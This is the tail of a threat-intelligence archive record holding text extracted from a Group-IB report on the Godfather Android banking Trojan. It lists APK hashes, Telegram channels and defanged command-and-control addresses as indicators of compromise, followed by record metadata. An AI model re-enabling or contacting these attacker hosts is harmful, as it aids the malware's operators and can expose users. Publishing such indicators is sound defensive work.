preparation, and other types of attacks.\r\nThe platform integrates data from Group-IB’s attribution-based Threat Intelligence system. Exclusive information\r\nabout cybercriminals, malware, adversary IP addresses, and compromised data (logins, passwords, bank cards)\r\nhelps develop anti-fraud systems and cybersecurity teams, which allows the latter to identify intruders and their\r\nactions.\r\nIn this way, Fraud Protection “catches” banking Trojans, detects unauthorized remote access, web injections,\r\ncross-channel attacks, and personal data collection. Group-IB’s solution implements patented algorithms that help\r\ndetect infected devices without the client’s involvement and without the need to install additional software.\r\nLinks\r\narrow_drop_down\r\nhttps://twitter.com/ThreatFabric/status/1505932079401480198\r\nhttps://securityintelligence.com/anubis-strikes-again-mobile-malware-continues-to-plague-users-in-official-app-stores/\r\nhttps://www.threatfabric.com/blogs/2020_year_of_the_rat\r\nhttps://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html\r\nhttps://www.threatfabric.com/blogs/anubis_2_malware_and_afterlife\r\nIOCs\r\narrow_drop_down\r\nAPKs:\r\n0b72c22517fdefd4cf0466d8d4c634ca73b7667d378be688efe131af4ac3aed8\r\n7664293fc1dde797940d857d1f16eb1e12a15b9126d704854f97df1bedc18758\r\n9815ba07d0a2528c11d377b583243df24218a48c6a4f839f40769ea290555070\r\na14aad1265eb307fbe71a3a5f6e688408ce153ff19838b3c5229f26ee3ece5dd\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 25 of 26\n\nc3dadb9a593523d1bf3fe76dabf375578119aff3110d92a1a4ee6db06742263a\r\nc4bace10849f23e9972e555ac2e30ac128b7a90017a0f76c197685a0c60def6d\r\nc79857015dbf220111e7c5f47cf20a656741a9380cc0faecd486b517648eb199\r\nd652ac528102de3ebb42a973db639ae27f13738e005172e5ff8aac6e91f3f760\r\nb6249fa996cb4046bdab37bab5e3b4d43c79ea537f119040c3b3e138149897fd\r\n9dfb5b4ad9aac36c2d7fbb93f8668faa819cb0df16f4a55d00f1cdda89c9a6d2\r\n38386f4fabd0bc7f7065eaee818717e89772fb3b1a3744df754c45778e353f70\r\nTelegram channels\r\nhttps://t.me/dobrynyanikitichsobre\r\nhttps://t.me/dobrynyanikitichwarrior\r\nhttps://t.me/nutkomterposekcons\r\nhttps://t.me/puykomterivon\r\nhttps://t.me/dukestepanovich\r\nhttps://t.me/bektororrope\r\nhttps://t.me/ropenetwork\r\nhttps://t.me/brutalhazing\r\nhttps://t.me/rosesoldiermans\r\nhttps://t.me/kingwallmansjob\r\nС\u0026C addresses\r\nhXXps://henkormerise[.]com/\r\nhXXp://168[.]100[.]9[.]86/\r\nhXXp://50[.]18[.]3[.]26/\r\nhXXp://45[.]61[.]138[.]60/\r\nhXXps://banerrokutepera[.]com/\r\nhXXp://heikenmorgan[.]com/\r\nSource: https://blog.group-ib.com/godfather-trojan\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 26 of 26\n\n  https://blog.group-ib.com/godfather-trojan \nFigure 5: Replicated DNS A records for Godfather’s C\u0026C addresses\nBelow is a screenshot of the hosted application on Google Play.\n   Page 9 of 26",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.group-ib.com/godfather-trojan"
	],
	"report_names": [
		"godfather-trojan"
	],
	"threat_actors": [],
	"ts_created_at": 1777949165,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ad279fa12ff24bffde1379e9761a9209b78f304b.pdf",
		"text": "https://archive.orkl.eu/ad279fa12ff24bffde1379e9761a9209b78f304b.txt",
		"img": "https://archive.orkl.eu/ad279fa12ff24bffde1379e9761a9209b78f304b.jpg"
	}
}